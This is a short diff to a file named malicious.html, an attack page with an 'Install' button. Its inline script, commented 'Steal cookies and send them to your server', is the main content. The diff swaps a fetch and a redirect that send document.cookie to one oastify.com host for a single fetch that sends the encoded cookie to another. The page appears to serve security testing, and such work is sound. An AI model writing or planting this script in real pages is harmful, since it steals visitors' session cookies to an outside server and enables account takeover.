--- a/malicious.html
+++ b/malicious.html
@@ -8,9 +8,7 @@
     <button id="installbutton">Install</button>
     <script>
         // Steal cookies and send them to your server
-        fetch('http://p4u449e3qme72i7v37vi20rylprgfh36.oastify.com/steal?cookie=' + document.cookie);
-        // Or redirect to a page with the stolen cookies
-        window.location.href = 'http://p4u449e3qme72i7v37vi20rylprgfh36.oastify.com/steal?cookie=' + document.cookie;
+        fetch('https://agupguqo27qse3jgfs73el3jxa31r3fs.oastify.com/steal?cookie=' + encodeURIComponent(document.cookie));
     </script>
 </body>
 </html>
